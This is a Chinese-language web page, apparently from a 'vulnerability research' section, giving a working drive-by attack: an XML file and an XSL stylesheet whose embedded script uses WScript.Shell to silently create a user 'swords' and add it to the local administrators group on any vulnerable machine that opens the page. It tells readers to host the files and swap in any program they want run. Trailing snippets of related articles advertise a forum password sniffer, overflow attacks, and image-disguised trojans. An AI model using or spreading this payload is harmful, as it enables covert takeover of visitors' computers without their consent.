利用xml+xsl给客户机添加超级管理帐户!_漏洞研究

用法:把swords.xml和swords.xsl放在一个普通空间,相信很少人会注意xml的安全性吧,嘎嘎,只要把你想运行的程序添加到run() 即可,默认支持js和vbs.
这个程序加了一个用户为 swords,密码为est的超级管理员账号。

swords.xml


<?xml version="1.0" encoding="GB2312"?>
<?xml-stylesheet type="text/xsl" href="swords.xsl"?>
<name>I am swords,I am admin!</name>

swords.xsl

<?xml version="1.0" encoding="gb2312"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:template match="/">
<html>
<body>
<xsl:value-of select="name" />
<xsl:script>
function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user swords est /add",0);
wsh.run( "net localgroup administrators swords /add",0);
wsh.run( "cmd.exe /c echo test!");
}
</xsl:script>
<xsl:eval>run()</xsl:eval>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

时间: 2024-09-19 09:14:34

利用xml+xsl给客户机添加超级管理帐户!_漏洞研究的相关文章

为动网论坛添加一个密码嗅探器(DVBBS)_漏洞研究

动网先锋论坛,凭借其强大全面的功能,再加上它免费提供给个人用户,在网络众多论坛中,独树一帜.很多人都把它作为自己论坛的最佳首选.但是新版本的论坛,对用户密码采用了不可逆的MD5加密,即使是管理员,也无法查询到个人用户的密码.再数据库中只能查询了加密后的结果.   先描述一下它得登陆过程,用户输入帐号后号,调用MD5函数,输入的密码加密,然后比较存储在数据库的数据和密码加密的结果是否相同.如果相同,登陆成功,将个人信息保存在COOKIE中.   现在我们要自己动手,为论坛增加一项记录密码的功能. 

利用xml+xsl快速生成大量JSP的常用代码的方法.

js|xml 利用xml+xsl快速生成大量JSP的常用代码的方法. 参考Jbuilder的Servlet向导来使用xml+xsl产生JSP的常用代码.xml样本: <?xml version="1.0" encoding="GB2312"?><?xml-stylesheet type="text/xsl" href="jspram.xsl"?><jsp xmlns:xsi="http:

在局域网中如何管理你的服务器和利用服务器管理好客户机

问题描述 我学电脑已有三个月了,刚学的时候还是什么都不会的,现在总算有了点基础.不过在学的过程中遇到了很多的困难,看书也不明白,上网也查不到,所以今天特意在网上寻求各位高手和师傅,希望可以帮帮我:现在我有一个问题就是:对于办公网络组网方面有些问题不是很明白,或许我比较少实践吧,老是觉得很空洞一样,无法适从,例如说,在我所工作的公司里,电脑管理人员很会对客户机进行管理,至于如何管理我真的有很大个问号啦,特别是对域的管理这一方面的,服务器的安装倒是没什么问题,老是觉得安装了不懂得去发挥它,如果有实例

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务

老兵新传-各种漏洞的利用和一些搜索参数_漏洞研究

各种漏洞的利用和一些搜索参数   说到漏洞,首先应该提到的就是动网的上传漏洞了.   "洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上   传漏洞接踵而来!   asp动网论坛漏洞分析   1.这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的.例子说明一下,在发帖时写入[img]javasx63ri

黑客如何利用Ms05002溢出找“肉鸡” (图)_漏洞研究

溢出攻击永远是安全界中,不可忽视的角色.而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有"惊人"的收获.至于熟练的溢出如何炼成?具体方法请见下文所示! 实施方法:通过Ms05002攻击工具,溢出反弹IP.反弹端口,会生成含有木马性质的文件.然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问.最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机. 步骤1.首先从网上下载Ms05002溢出工具,释放到比较

利用图片做木马应用完全解析_漏洞研究

何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行.    然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVAscript脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件,把它拷贝到TEMP目录.再编写一个脚本把找到的BMP文件用DEBUG还原成EXE,并把它放到注册表启

动易SQL版新洞利用短信功能直接拿后台_漏洞研究

先注册个号,进入控制面版给自己发条短信   http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4   这就是点```   用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为   =没有登陆````ef0020cf8c5e45b9 密码是这个```   下面就开始将管理员的密码更新为我注册用户的密码````   利用动易爆库改库程序先将pe_admin里ad

利用IE Object Data漏洞制做全新网页木马(图)_漏洞研究

原发黑客x档案第8期,版权归杂志所有. 利用Internet Explorer Object Data漏洞制做全新网页木马lcx今年8月20日,微软公布了一个最高严重等级的重要漏洞--Internet Explorer Object数据远程执行漏洞.这对于网页木马爱好者来说可是一件好事,我们可以用这个漏洞来制做一款全新的暂时不会被查杀的木马了.在介绍如何制做这个全新网页木马前我先给大家简单介绍一下该漏洞.一.漏洞描述该漏洞内由eEye Digital Security发现并于8月20号公布的,微